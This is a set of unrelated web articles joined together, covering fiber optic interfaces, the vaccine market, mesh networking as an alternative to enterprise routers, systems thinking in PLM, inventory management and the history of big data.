In addition to fiber type and connector selection, another vital issue for the technician is to evaluate the interface option which determines the network performance. The selection of interface is relevant to the fiber type, cable distance and speed of the connection as well. Installers can rely on modular Gigabit fiber-optic interfaces, called gigabit interface converters (GBICs) for most interface converters. These flexible interfaces come in several form factors, including XENPAK and SFP+, and can accommodate a variety of device applications. The picture below shows a typical gigabit fiber optic converter.
While choosing the right interfaces, installers need to take their light sources into consideration. Light-emitting diodes (LEDs) work only with multimode fiber and operate at the 850nm window; laser works only with single-mode fiber and operates at the 1550nm window; and vertical-cavity surface-emitting laser (VCSEL) works with both types of fiber and operates at the 1310nm window.
In summary, to build a well-performed fiber optic system, realizing the applications and capacity expectations should be put into first place. As you can see, selecting the appropriate cable design for your application should require a thorough review of the entire pathway for the cable, including the type of fiber, optical connectors as well as interface options. The decision of selection can affect the fiber protection and performance, ease of the installation, splicing or termination, service lifetime, and, most importantly, cost. | <urn:uuid:ee7fd815-0be2-42bb-8725-6cdda3ec25a1> | CC-MAIN-2024-38 | https://www.fiber-optic-components.com/tag/single-mode-fiber-optic-cable | 2024-09-12T21:54:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00028.warc.gz | en | 0.926023 | 1,108 | 2.671875 | 3 |
These issues include tackling the diseases that lack an effective vaccine and developing new technologies and approaches to address a future pandemic.
A new report from Frost & Sullivan highlights the platforms that can help companies overcome these challenges and make significant progress in vaccine development.
Tech Transfer is Accelerating Disruption
The COVID-19 pandemic undoubtedly led to a dramatic increase in investment and activity in the vaccine industry as companies raced to develop a vaccine to deal with the virus.
This also led to a shift toward tech transfer—the process of moving technology from one company or organization to another—and the entry of new, resourceful start-ups.
More emphasis is being placed on bringing innovation into the development, process and design of next-generation vaccines to maintain a stronghold on the market.
Other growth areas include controlled temperature chain (CTC) and heat-stable vaccines, which will be a major part of vaccine development programs between 2022 and 2025.
Factors Driving Disruption in the Vaccine Industry
Several factors are driving disruption in the vaccine industry, including the patient-centric approach seen during the pandemic to develop streamlined and resilient solutions.
Key industry players are engaged in sharing the next-generation vaccine platforms by leveraging the capabilities and long-standing expertise of innovation leaders, leading to a win-win situation to overcome the competitive barriers.
In addition, companies need to develop needle-free delivery and look at novel disease indications such as cytomegalovirus and glioblastoma, an aggressive type of cancer, for new growth avenues.
One of the major revenue boosts is the strategic procurement of vaccines by governments for their national immunization programs, which will inevitably lower vaccine prices and improve national health outcomes.
Key Growth Opportunities in the Vaccine Industry
There will be significant growth in the coming years as new technologies and approaches are being developed by mid-sized to large companies to address a variety of chronic diseases.
One area of promising research is the development of nucleic acid-based vaccines, which have shown great potential in the treatment of cancer and HIV.
Companies are also exploring new disease areas that have been untouched by vaccine development, including vaccines for asthma, Respiratory Syncytial Virus (RSV) Infection, and diabetes.
Utilizing platforms and models designed for COVID-19 vaccine development will help companies save time and resources as they make huge steps in developing vaccines for other disease areas.
Global Vaccine Market to Experience Significant Growth
The global vaccine market is anticipated to experience significant growth in the coming years as new technologies and approaches are developed to address a variety of diseases.
Companies can make significant progress in developing and producing new vaccines by utilizing the advanced platforms and models designed for COVID-19 vaccine development.
Finally, the transfer of technology to different regions will boost efficiencies and the capacity to deal with future pandemics as vaccine solutions are developed and distributed more quickly.
Frost & Sullivan provides an outlook for the global vaccine industry for 2022 and beyond, including emerging trends and growth opportunities, in a new study: https://bit.ly/3LKMOKc | <urn:uuid:56b069d2-5274-4560-b7b7-f5373b812f81> | CC-MAIN-2024-38 | https://dev.frost.com/growth-opportunity-news/growth-opportunities-in-the-global-vaccine-market/ | 2024-09-16T13:17:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00628.warc.gz | en | 0.950459 | 637 | 2.578125 | 3 |
The Routerless Enterprise
Routers – supplied by companies such CISCO, Huawei, Juniper, etc. – are the cornerstone of Enterprise networks and a possible intrusion vector to steal trade secrets in a fierce international competition context.
Back 15 years ago, it is said that German government financed the GPG open source project after it discovered that US government had been spying its diplomatic delegation at United Nations (UN) through backdoors present in a US made router . CISCO routers are likely to include backdoors . Huawei routers are banned in certain countries for similar rationale . And Alcatel routers do not seem to be less exempt of backdoors either .
15 years after rumours of router intrusions emerged, Edward Snowden reports have provided evidences of the existence of backdoors in telecommunication equipment. Yet, companies, governments and military still rely on routers for very sensitive infrastructure and thus expose themselves to remote intrusion and trade secret theft. Free Sofware routers such as the Linux router project are a good solution to eliminate backdoors because most of their code can be audited. But they failed to scale and match carrier grade reliability due to the limitation of the PC architecture, to the absence of open source drivers for high performance network cards or to difficulties of hiring developers that understand the Linux kernel network stack. Lost Oasis, an independent French telecommunication company which used to be a major user of the Linux Router project in the early 2000, now relies on proprietary routers for its backbone network.
Yet, one alternative has not yet been fully considered for Enterprise networks: mesh topology.
Most enterprise networks are centralized. They are based on so-called hierarchical topology, where a central high performance router acts as border gateway to the outside world and aggregates network traffic from smaller routers in charge of each region or department of an organisation. This central router has to provide extremely high routing performance, something that a only specialized hardware can achieve.
But if we look in detail, nothing except maybe access control rules actually require a centralized networking architecture. Network routing is often compared to car traffic management. There is for example no need for cars to pass through Beijing in order to travel from Shanghai to Shenzen. It is the same for networks: there is no need for network packets to go through a central router at the headquarters of a company in order to travel from one corporate department to another. With a good car navigation technology – such as Amap or Google Maps – car drivers can even know in real time which small roads can be used to circumvent congestion on highways. It is the same for networks: modern routing protocols can automatically circumvent network delays on congested routers and find a faster path at any time.
Thanks to advances in routing protocols known as babel or OLSR , it is now possible to design an Enterprise network based on the above metaphor of roads and car navigation. Every network cable or wireless network acts like a road for network packets. Every PC and every smartphone acts like a crossing. Every PC and every smartphone embeds a routing service that acts like a car navigation system by tracking the speed of the network traffic on each cable or wireless network. Network packets that are sent from one part of the company to another part of the company can thus find at any time the most efficient route to take. If one network cable required to access a server remains always congested, adding a second cable will likely solve congestion, just like adding a second access road can solve congestion to reach a popular exhibition center. By advising packets to take the least congested route at any time, traffic gets automatically split between the two cables – for a server – or between the two roads – for an exhibition center.
What we have just described is called a mesh network. It is known to be the most resilient form of network since it can still operate in case of partial destruction, which is not the case of hierarchical enterprise networks. Mesh networks are used primarily by military to quickly deploy a wireless network on a battle field. Each soldier’s PC acts as a router for neighbouring soldiers. Casualties among soldiers do not have consequences on the general availability of the network.
But mesh networks could have many civilian applications in data centers or in wide area wired networks.
Let us imagine for example a datacenter with 160 servers. Let us split the 160 servers in 32 groups of 5 servers. Each server in a group of 5 servers is connected to a non manageable switch through its first network interface. The second network interface of each server in a group of 5 servers is then connected to a server in 5 other different groups. Network cables connected on the second interface of each server form together called a “hypercube”, a geometric structure similar to the cube (see illustration bellow) but in a 5 dimension space. A total of 320 cables are used to interconnect 160 servers with a huge potential bandwidth and high resiliency: each server can access another server in another a group through 5 possible different exit routes. The routing protocol – babel for example – finds at any time which of the 5 possible exit routes is the best to reach another server.
Illustration – a hypercube mesh network for data center management (credit Wendelin project)
Let us now imagine a company with 1000 users of laptops and smartphones and 30 servers in 20 different countries. This company uses a combination of network technologies: optical fiber, 3G, 4G, DSL, Wifi, etc. For this type of situation, we can use a structure called a “random mesh”. Each laptop, smartphone or server creates randomly 10 links to other laptops, smartphones or servers in the world. Each link uses some kind of encapsulation such as GRE. Links play here the same role as cables in the previous datacenter example. The routing protocol – babel for example – finds at any time the fastest route between two device by combining links. With about 1000 device and 10 links per device, this route does not usually require more than 3 successive links.
The re6st open source project that was initiated by my company is an example of implementation of the “random mesh” approach based on babel. It has been used since 2013 to solve downtime problems often found in transnational deployments of online business applications for large European and Japanese companies. Configuration of routers in peering points sometimes include errors that either lead to extremely high latency (ex. 800 ms from Hong-Kong to Hong-Kong) or to connectivity loss (ex. from Dublin to Paris via broken router in Amsterdam). The use of re6st helps reducing latency (ex. 100 ms from Hong-Kong to Hong-Kong via Singapore) or recovering connectivity (ex. from Dublin to Paris via Marseilles) by discovering alternate routes. It thus provides better online access to business applications in a multinational company without having to rely on redundant dedicated lines.
Online gaming industry in China could be another possible application of mesh networking. By creating a fully connected mesh between all gaming servers and deploying babel with re6st, it is possible to circumvent congested routed between north and south of China, between cities or between telecommunication companies. Babel protocol has been extended in 2014 to optimize routes based on low latency, which is exactly what online gamers are expecting.
Mesh networks have many other applications: telematics in the automotive industry [11, 12, 13], distributed mesh cloud , internet of things, smart cities, control systems in navy, etc. One should however be careful about one aspect in mesh networks: security. As in any distributed system, intrusion in one part of the system bears the risk of propagating to the whole system. Since the system is distributed, there are many more entry points than with a centralized system. Critics of distributed networking architectures often point this risk to stick to a conservative approach, but also ignore the danger of single point of failure in hierarchical networks which can tear down instantly the whole network.
The babel protocol provides a first solution to strengthen security: authentication certificates. Thanks to the efforts of Yandex engineer in Russia, all nodes in a babel network authenticate each other: this reduces the risk of accepting intruders . re6st provides another solution: authentication of links . Intruders without a valid certificate can not create a links to other nodes of a re6st network. re6st can also revoke certificates of compromised nodes. For large corporations or distributed cloud operators, a hybrid approach combining central definition of firewall policies with distributed implementation of packet filtering rules may provide the best of both worlds.
I hope that this article will raise your curiosity and lead you to research more about networking protocols that have made immense progress compared to the 26 years old OSPF used by most corporations (RFC 1131 published in October 1989). There many protocols similar to babel which are worth considering: AODV , batman , OLSR, RPL , etc. “Fair routing”, an algorithm that prevents malicious intruders from deviating network traffic , could also solve the unresolved problem of building a truly secure network. RINA , a new networking protocol supported by John Day and Louis Pouzin (two pioneers who inspired the Internet), introduces an innovative approach that unifies all network protocols better than IPv6. Overall, network innovation is still alive and potentially very useful to design Enterprise networks more efficiently, as long as one tries to look beyond traditional suppliers of hardware routers.
GPG – http://en.wikipedia.org/wiki/Werner_Koch
NSA blamed for adding backdoors to made in USA routers – http://www.numerama.com/magazine/29353-la-nsa-accusee-d-avoir-piege-les-routeurs-americains.html
Huawei boss says US ban not very important – http://www.bbc.com/news/business-29620442
Alcatel OmniSwitch 7700/7800 switches backdoor – http://www.acunetix.com/vulnerabilities/network/vulnerability/alcatel-omniswitch-7700-7800-switches-backdoor/
Linux Router Project – http://en.wikipedia.org/wiki/Linux_Router_Project
Lost Oasis – http://www.ielo.net/
AutoNavi – http://en.wikipedia.org/wiki/AutoNavi
Google Maps – http://en.wikipedia.org/wiki/Google_Maps_Navigation
Babel – http://en.wikipedia.org/wiki/Babel_%28protocol%29
OLSR – http://en.wikipedia.org/wiki/Optimized_Link_State_Routing_Protocol
Carmesh – http://www.carmesh.eu/
Ford working on car-to-car mesh network – http://www.extremetech.com/extreme/92532-ford-working-on-car-to-car-wireless-mesh-network-for-real-time-telemetry-government-use
The Fully Networked Car – http://www.itu.int/dms_pub/itu-t/oth/06/10/T06100004020001PDFE.pdf
VIFIB wants to host your cloud at home – http://www.pcworld.com/article/198755/ViFiB_Wants_You_to_Host_Cloud_Computing_at_Home.html
RFC 7298 – https://tools.ietf.org/html/rfc7298
re6st – http://lists.alioth.debian.org/pipermail/babel-users/2013-January/001132.html
AODV – http://zh.wikipedia.org/wiki/AODV
B.A.T.M.A.N. – http://en.wikipedia.org/wiki/B.A.T.M.A.N..
RPL – http://www.bortzmeyer.org/6550.html
A Fair and Secure Cluster Formation Process for Ad Hoc Networks – http://link.springer.com/article/10.1007/s11277-010-9994-7
IRATI – https://github.com/IRATI | <urn:uuid:5af033d6-e889-49b3-bff3-82b421bbb0e3> | CC-MAIN-2024-38 | https://www.ctocio.com/tech/networking/18624.html | 2024-09-17T18:06:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00528.warc.gz | en | 0.900078 | 2,534 | 2.578125 | 3 |
The 2021 Texas power crisis was the result of many things—being unprepared for an extreme snowstorm, inadequately winterized power equipment, power grids isolated to the state, and so on. However, it’s fair to say this crisis was largely a miscalculation of risks. It was a failure to predict and mitigate a series of compounding factors, which led to a break under pressure. We can call it a failure in Systems Thinking.
After the fact, it’s easy to say that Texas should have winterized their wind turbines, but that’s only one detail—the crisis was the sum of much more. All power took a hit, including coal and nuclear. Worse, gas production froze along with pipelines.
As heating demands rose sharply, the lack of natural gas was problematic as many of Texas’s power plants rely on gas to generate their electricity, thus the power grids going offline was inevitable. The halt of gas production was perhaps the biggest culprit in the power crisis, but the broader system—particularly electrical infrastructure across much of the state—had little recourse without it. It was an inability to mitigate undesirable emergent behaviors and cross-dependencies that resulted in catastrophic failure.
Again, a failure in Systems Thinking.
Systems Thinking says nothing lives in isolation. Everything affects everything. It’s like the butterfly effect of chaos theory, which isn’t to say butterflies set off chain reactions that blow volcanos or cause tsunamis, but that the Earth is a complex and interlinked system, where even something as small as a butterfly is moving with everything else.
The idea of managing complexity in systems is nothing new—System Thinking has been around for decades. The challenge now is that many organizations still aren’t giving Systems Thinking its proper due, sometimes with a great cost. This is true even of PLM and its users, but vendors are catching up.
The concept of the butterfly effect was first used to describe the impossibility of predicting the weather far into the future, because weather systems are too complex for us to track every proverbial butterfly. Similarly, it is impossible for any one person to fully understand today’s design complexity, which is increasing at an ever-accelerating pace. No one can or should predict every little variant or mistake on their own. So rather than chasing butterflies, we can govern our design complexity with effectively applied Systems Thinking.
We do this with a modern PLM platform capable of tracking all life cycles of the system, from conception and design to operation and maintenance.
Because of rising complexities in today and tomorrow’s products, with more functionality and more variance of functionality, often the design of a product has become the design of a system with many different implementations. PLM platforms came from the mechanical world that focused on just the product. Now they’re evolving to meet a world of systems—a world where you have to have to manage everything about a system as a system of systems first, without knowing the details of the design of products.
We apply Systems Thinking to how we look at what PLM is managing. Because everything affects everything, it is critical the platform be able to connect the product at all stages to a system model, such as with a Digital Thread. Tools have to be able to show their data models to PLM data models. Whatever system PLM is going to manage in the future, it has to do so in the context of a data model of that system, where every change goes through said model. The system model is the connective tissue sitting inside PLM and everything in PLM connects through it. That is the crux of Systems Thinking.
PLM used to manage just design data. Now we’re managing design intent, which drives design data. We can’t predict the outcome of every storm, so we should instead prepare to mitigate their effects.
Steven Jobs once said, “You can't connect the dots looking forward; you can only connect them looking backwards.” Predicting the future—and future failures like in Texas—requires full traceability from the beginning—in short, with a Digital Thread and the platform to support it. This is the strength of a PLM Platform, as they not only manage design data, but also the system across the entire lifecycle from the start to any indefinite point in the future.
Failure may not always be completely preventable, but with the right thinking and platform, it should always be manageable.
Mark Reisig is the Vice President of Product Marketing at Aras. | <urn:uuid:05893bdb-aee6-46b7-88d1-578ead740189> | CC-MAIN-2024-38 | https://www.mbtmag.com/software/blog/21440005/managing-failure-systems-thinking-and-the-butterfly-effect | 2024-09-19T01:06:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00428.warc.gz | en | 0.961563 | 935 | 2.5625 | 3 |
Inventory management is a crucial asset for businesses as it enables them to minimise the cost of inventory on a company’s balance sheet when they receive these goods. Inventory can be classified in three ways, including materials, work-in-progress, and finished goods.
What Is Inventory?
Inventory is the accounting of items, component parts and raw materials that a company either uses in production or sells. As a business leader, you practice inventory management in order to ensure that you have enough stock on hand and to identify when there’s a shortage.
The verb “inventory” refers to the act of counting or listing items. As an accounting term, inventory is a current asset and refers to all stock in the various production stages. By keeping stock, both retailers and manufacturers can continue to sell or build items. Inventory is a major asset on the balance sheet for most companies, however, too much inventory can become a practical liability.
Video: What Is Inventory?
- Inventory, which describes any goods that are ready for purchase, directly affects an organisation’s financial health and prosperity.
- While there are many types of inventory, the four major ones are raw materials and components, work in progress, finished goods and maintenance, repair and operating supplies.
- While there are many ways to count and value your inventory, the importance lies in accurately tracking, analysing and managing it. Insights gained from inventory evaluations are necessary for success as they help companies make smarter and more cost-efficient business decisions.
An organisation’s inventory, which is often described as the step between manufacturing and order fulfilment, is central to all its business operations as it often serves as a primary source of revenue generation. Although inventory can be described and classified in numerous ways, it’s ultimately its management that directly affects an organisation’s order fulfilment capabilities.
For example, in keeping track of raw materials, safety stock, finished goods or even packing materials, businesses are collecting crucial data that influences their future purchasing and fulfilment operations. Understanding purchasing trends and the rates at which items sell determines how often companies need to restock inventory and which items are prioritised for re-purchase. Having this information on hand can improve customer relations, cash flow and profitability while also decreasing the amount of money lost to wasted inventory, stockouts and re-stocking delays.
13 Types of Inventory
There are four different top-level inventory types: raw materials, work-in-progress (WIP), merchandise and supplies, and finished goods. These four main categories help businesses classify and track items that are in stock or that they might need in the future. However, the main categories can be broken down even further to help companies manage their inventory more accurately and efficiently.
Raw Materials: Raw materials are the materials a company uses to create and finish products. When the product is completed, the raw materials are typically unrecognisable from their original form, such as oil used to create shampoo.
Components: Components are like raw materials in that they are the materials a company uses to create and finish products, except that they remain recognisable when the product is completed, such as a screw.
Work In Progress (WIP): WIP inventory refers to items in production and includes raw materials or components, labour, overhead and even packing materials.
Finished Goods: Finished goods are items that are ready to sell.
Maintenance, Repair and Operations (MRO) Goods: MRO is inventory — often in the form of supplies — that supports making a product or the maintenance of a business.
Packing and Packaging Materials: There are three types of packing materials. Primary packing protects the product and makes it usable. Secondary packing is the packaging of the finished good and can include labels or SKU information. Tertiary packing is bulk packaging for transport.
Safety Stock and Anticipation Stock: Safety stock is the extra inventory a company buys and stores to cover unexpected events. Safety stock has carrying costs, but it supports customer satisfaction. Similarly, anticipation stock comprises of raw materials or finished items that a business purchases based on sales and production trends. If a raw material’s price is rising or peak sales time is approaching, a business may purchase safety stock.
Decoupling Inventory: Decoupling inventory is the term used for extra items or WIP kept at each production line station to prevent work stoppages. Whereas all companies may have safety stock, decoupling inventory is useful if parts of the line work at different speeds and only applies to companies that manufacture goods.
Cycle Inventory: Companies order cycle inventory in lots to get the right amount of stock for the lowest storage cost.
Service Inventory: Service inventory is a management accounting concept that refers to how much service a business can provide in a given period. A hotel with 10 rooms, for example, has a service inventory of 70 one-night stays in each week.
Transit Inventory: Also known as pipeline inventory, transit inventory is stock that’s moving between the manufacturer, warehouses and distribution centres. Transit inventory may take weeks to move between facilities.
Theoretical Inventory: Also called book inventory, theoretical inventory is the least amount of stock a company needs to complete a process without waiting. Theoretical inventory is used mostly in production and the food industry. It’s measured using the actual versus theoretical formula.
Excess Inventory: Also known as obsolete inventory, excess inventory is unsold or unused goods or raw materials that a company doesn’t expect to use or sell but must still pay to store.
Inventory is known as being a company’s goods and products that can be sold. It is labeled as being the current asset on a company’s balance sheet. The intermediary between manufacturing and order fulfilment.
Real-world examples can make inventory models easier to understand. The following examples demonstrate how the different types of inventory work in retail and manufacturing businesses.
Raw Materials/Components: A company that makes T-shirts has components that include fabric, thread, dyes and print designs.
Finished Goods: A jewelry manufacturer makes charm necklaces. Staff attaches a necklace to a preprinted card and slips it into cellophane envelopes to create a finished good ready for sale. The cost of goods sold (COGS) of the finished good includes both its packaging and the labour exerted to make the item.
Work In Progress: A cell phone consists of a case, a printed circuit board, and components. The process of assembling the pieces at a dedicated workstation is WIP.
MRO Goods: Maintenance, repair and operating supplies for a condominium community include copy paper, folders, printer toner, gloves, glass cleaner and brooms for sweeping up the grounds.
Packing Materials: At a seed company, the primary packing material is the sealed bag that contains, for example, flax seeds. Placing the flax seed bags into a box for transportation and storage is the secondary packing. Tertiary packing is the shrink wrap required to ship pallets of product cases.
Safety Stock: A veterinarian in an isolated community stocks up on disinfectant and dog and cat treats to meet customer demand in case the highway floods during spring thaw and delays delivery trucks.
Anticipated/Smoothing Inventory: An event planner buys discounted spools of ribbon and floral tablecloths in anticipation of the June wedding season.
Decoupled Inventory: In a bakery, the decorators keep a store of sugar roses with which to adorn wedding cakes – so even when the ornament team’s supply of frosting mix is late, the decorators can keep working. Because the flowers are part of the cake’s design, if the baker ran out of them, they couldn’t deliver a finished cake.
Cycle Inventory: As a restaurant uses its last 500 paper napkins, the new refill order arrives. The napkins fit easily in the dedicated storage space.
Service Inventory: A café is open for 12 hours per day, with 10 tables at which diners spend an average of one hour eating a meal. Its service inventory, therefore, is 120 meals per day.
Theoretical Inventory Cost: A restaurant aims to spend 30% of its budget on food but discovers the actual spend is 34%. The “theoretical inventory” is the 4% of food that was lost or wasted.
Book Inventory: The theoretical inventory of stock in the inventory record or system, which may differ from the actual inventory when you perform a count.
Transit Inventory: An art store orders and pays for 40 tins of a popular pencil set. The tins are en route from the supplier and, therefore, in transit.
Excess Inventory: A shampoo company produces 50,000 special shampoo bottles that are branded for the summer Olympics, but it only sells 45,000 and the Olympics are over — no one wants to buy them, so they’re forced to discount or discard them.
The Importance of Inventory Control
Inventory control helps companies buy the right amount of inventory at the right time. Also known as stock control, this process helps optimise inventory levels, reduces storage costs and prevents stockouts.
Inventory control empowers companies to collect the maximum amount of profit. It enables them to minimise the investment made in stock, allowing companies to best evaluate their ongoing assets, account balances, and financial reports. It is important because it prevents exuberant costs because of purchasing too much or inessential inventory, rather prioritising the obligatory inventory.
With the appropriate internal and production controls, the practice ensures the company can meet customer demand and delivers financial elasticity. Inventory control enables the maximum amount of profit from the least amount of investment in stock without affecting customer satisfaction. Done right, it allows companies to assess their current state concerning assets, account balances and financial reports.
Inventory Best Practices
The business saying “if you can’t measure it, you can’t manage it” applies to inventory management and best practices. While the first best practice is keeping track of your inventory, others include:
Carry Safety Stock:
Also known as buffer stock, these products help
keep companies from running out of materials or high-demand items. Once companies deplete
their calculated supply, safety stock serves as a backup should the level of demand increase
Invest in a Cloud-based Inventory Management Program:
management systems let companies know in real-time where every product and SKU are
located globally. This data helps an organisation be more responsive, up-to-date, and
Start a Cycle Count Program:
Cycle counting benefits extend well
past the warehouse by keeping stock reconciled and customers happy while also saving
businesses time and money.
Use Batch/Lot Tracking:
Record information associated with each
batch or lot of a product. While some businesses log precise details, such as expiration
dates that provide information about their products’ sellable dates, companies that do not
have perishable goods use batch/lot tracking to understand their products’ landing costs or
Inventory management is critical in strengthening companies supply chain because it helps to stabilise the dynamics between customer demand, storage space, and cash restraints.
What Is Inventory Turnover?
Inventory turnover is the number of times a company sells or uses an item in a specific timeframe, which can reveal whether a company has too much inventory on hand. To determine inventory turnover, use the following equations:
Average inventory = (Beginning Inventory + Ending Inventory) / 2
Inventory turnover = Sales + Average Inventory
What Is Inventory Analysis?
Inventory analysis is the study of how product demand changes over time and it helps businesses stock the right amount of goods and project how much customers will want in the future.
A well-known method for performing inventory analysis is ABC analysis(opens in a new tab). To perform an ABC analysis, group goods into three categories:
A inventory: A inventory includes the best-selling products that require the least space and cost to store. Many experts say this represents about 20% of your inventory.
B inventory: B items move at a similar rate to A items but cost more to store. Generally, this represents about 40% of your inventory.
C inventory: The remainder of your stock costs the most to store and returns the lowest profits. C inventory represents the other 40% of your inventory.
ABC analysis leverages the Pareto, or 80/20, principle and should reveal the 20% of your inventory that garners 80% of your profits. A company will want to focus on these items to increase sales and net profit margins. Inventory analysis may influence the choice of inventory control methods, whether just-in-time or just-in-case.
Benefits of Inventory Analysis
Inventory analysis raises profits by lowering costs and supporting turnover. It also:
Improves Cash Flow: Inventory analysis helps you identify and reorder items you sell often, so you don’t spend money on inventory that moves slowly.
Reduces Stockouts: When you understand which inventory customers want most, you can better anticipate demand and prevent stockouts.
Increases Customer Satisfaction: Analysing inventory offers insight into what and how customers purchase goods.
Reduces Wasted Inventory: Understanding what, when and how much people buy minimises the need to store obsolete products, as well as when products expire so you can have a strategy behind using them.
Reduces Project Delays: Learning about supplier lead times helps you understand when to reorder and how to avoid late shipments.
Improves Pricing From Suppliers and Vendors: Inventory analysis can lead you to order high volumes of products regularly rather than small volumes on a less reliable schedule. This regularity can put you in a stronger position to negotiate discounts with suppliers.
Expands Your Understanding of the Business: Reviewing inventory provides insights into your stock, customers and business.
NetSuite Software for Managing All Your Inventory Needs
Properly managing inventory can make or break a business. Having insight into your stock at any given moment is critical to success. Decision makers know they need the right tools in place to be able to manage their inventory effectively. NetSuite offers a suite of native tools for tracking inventory in multiple locations, determining reorder points and managing safety stock and cycle counts. Find the right balance between demand and supply across your entire organisation with the demand planning and distribution requirements planning features.
NetSuite provides cloud inventory management solutions that are the perfect fit for companies within the startup to small businesses to Fortune 100 range. Learn more about how you can use NetSuite to help plan and manage inventory, reduce handling costs and increase cash flow.
What is manufacturing inventory?
In manufacturing, inventory consists of in-stock items, raw materials and the components used to make goods. Manufacturers closely track inventory levels to ensure there isn’t a shortage that could stop work.
Accounting divides manufacturing stock into raw materials, WIP and finished goods because each type of inventory bears a different cost. Raw materials typically cost less per unit than do finished items.
What does inventory mean in the service industry?
Every company has stock that supports its regular business. For service companies, this inventory is intangible. A law firm’s inventory, for example, includes its files, while paper on which to print legal documents is the firm’s MRO.
What is inventory process?
An inventory process tracks inventory as companies receive, store, manage and withdraw or consume it as work in progress. Essentially, the inventory process is the lifecycle of goods and raw materials.
What are the four different inventory types?
There are four main types of inventory: raw materials/components, WIP, finished goods and MRO. However, some people recognise only three types of inventory, leaving out MRO. Understanding the different types of inventory is essential for making sound financial and production planning choices.
How is inventory controlled?
Inventory control — or stock control — is making sure that your business has the right supply of inventory to meet customer demand. This usually requires inventory management software and supply chain management (SCM) software that brings in data from purchases, shipping, warehousing, reorders, receiving, storage, loss prevention, and even customer satisfaction.
What is an inventory record?
An inventory record, or stock record, contains data about the items a company has in stock, such as the amount of inventory on hand, what’s been sold and reordered, what’s on order, the product’s value, and where it’s stored. It’s important to keep accurate inventory records to assist with inventory control and keep accurate balance sheets.
What is demand forecasting?
Demand forecasting is the practice of predicting customer demand by looking at past buying trends, such as promotions and seasonality. Accurately predicting demand provides a better understanding of how much inventory you’ll need and reduces the need to store surplus stock.
Inventory forecasting relies on data to inform decisions, applying information and logic to guarantee you’ve got enough product on hand to meet demand while not tying up cash with unnecessary inventory. There are a number of advanced simulations used, but it typically comes in the form of trend forecasting, graphical forecasting, qualitative forecasting, or quantitative forecasting.
What is average inventory cost?
The average cost of inventory is a method for calculating the per-unit cost of goods sold. To calculate the average cost, get the sum of the cost of all stock for sale, and divide it by the number of items sold.
This method is also called weighted average cost, and is a valuable way to determine the value of your current inventory. It works best for brands that have high volumes of inventory and SKUs that are similar in cost. One of its benefits over other methods is that it makes it easier to track and consistently calculate inventory value by using a blended average.
What is inventory count?
An inventory count is the physical act of counting and checking the condition of items in storage or a warehouse. An inventory count also checks the condition of items. For accounting purposes, inventory counts help assess assets and debts.
Inventory counts help you understand which stock is moving well and inventory managers often use this information to forecast stock needs and manage budgets. | <urn:uuid:50f9a968-1e1c-4881-bca9-249e33780efd> | CC-MAIN-2024-38 | https://www.netsuite.com.au/portal/au/resource/articles/inventory-management/inventory.shtml | 2024-09-20T07:10:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00328.warc.gz | en | 0.94251 | 3,781 | 3.21875 | 3 |
UPDATE: Supercomputers: Then vs Now
March 9, 2016HIPAA: What Does It Mean for Data Centers?
March 16, 2016Welcome to the internet, a digital-zoo of anonymity, hopes, and dreams. It’s only here that reputations can be established or ruined at a rodent’s mercy. It’s a method so simple even a monkey could do it. Hence the persistent mailchimp. However, that doesn’t mean the internet is up for monkey business.
Since the inception of Commercial Internet Service Providers (ISPs) in the late 80s and early 90s, the internet has stimulated tremendous economic growth by establishing new markets. As a result, numerous pioneers have laid the foundation by interconnecting communities and cultures by creating social media platforms like Facebook, Instagram, and Twitter. These communal networks have allowed people across the globe to successfully interact, share, and enjoy experiences across the digital spectrum in real time.
These digital arenas have not only created the potential for big markets but also created new enterprises and concepts such as big data. However, with big data comes big responsibility and the even bigger business of big data storage.
How Did Big Data Get so Big?
The internet wasn’t always a big deal. In its beginning it was only used by researchers and those tolerant enough to to learn the complex system. It wasn’t until the late 80s—when it was suggested that the U.S. government share information through “hypertext” on the newly developed World Wide Web—that size does matter was considered.
The British computer scientist Tim Berners-Lee accurately predicted information growth would “grow past a critical threshold” because of the influx of information. Needless to say, he was right.
In October 1997, Michael Cox and David Ellsworth, two NASA researchers, published a research paper entitled “Application controlled demand paging for out-of-core visualization.” The article explained the paradox of supercomputers creating massive data sets which hindered the “capacities of main memory, local disks and even remote disks.”
The scientists called the complication “big data,” a term which has grown in popularity in a short time. However, the idea is bigger than ever. Big data has not only revolutionized the internet, it also spurred innovation in the field of data storage.
How Is All This Big Data Stored?
The World Wide Web’s tremendous growth over the last two decades has lead to a more data driven world. Startups often service millions of robust users simultaneously worldwide. This has lead to an increased demand in storage and a jolt in innovation.
Traditional Relational Database Systems (RDBMS), which were the standard for the internet in its inception, have now become a collapsing technology due to ever increasing demand for big data. Large corporations such as Google, Amazon, and the CIA have adopted new unstructured database frameworks such as NoSQL, which sacrifices consistency and organization for speed and agility.
Hadoop is another technology that has emerged from the bowels of big data. The Java-based open source framework compliments NoSQL distributed databases and allows for the creation of server based software while mitigating cutbacks in performance. As these large enterprises become even bigger there will be an increased demand for better technologies from tomorrow’s geniuses.
However, for now, companies and governments will utilize their data sets to maximize their marketing potential and open doors for opportunists.
Who Uses All of This Data?
With capitalism there are always opportunities and the business of big data is no different. A cluster of markets have been created which have enabled entrepreneurs to cash in big. As a result, big data is currently being analyzed and implemented in many industries of both the public and private sectors worldwide.
Numerous businesses are currently utilizing big data analytics to process real-time trends of their target markets. Companies now successfully marginalize their audience and mitigated costs by only advertising to those who have an exclusive interest in their brand. Supply chain and logistic companies are now able to receive live traffic data which prioritizes routes, increases customer satisfaction, and enhances brand reputation.
In addition, social media platforms are making it a lot easier for their users to get stuck in their digital networks. Big data analytics is assisting with the delivery of the latest and hottest trends/topics. Everything from Donald Trump to crashing squirrels are fair game. If it’s popular, it’s a pop-up. Unfortunately, this has made it only easier for the world to “keep up with the Kardashians.”
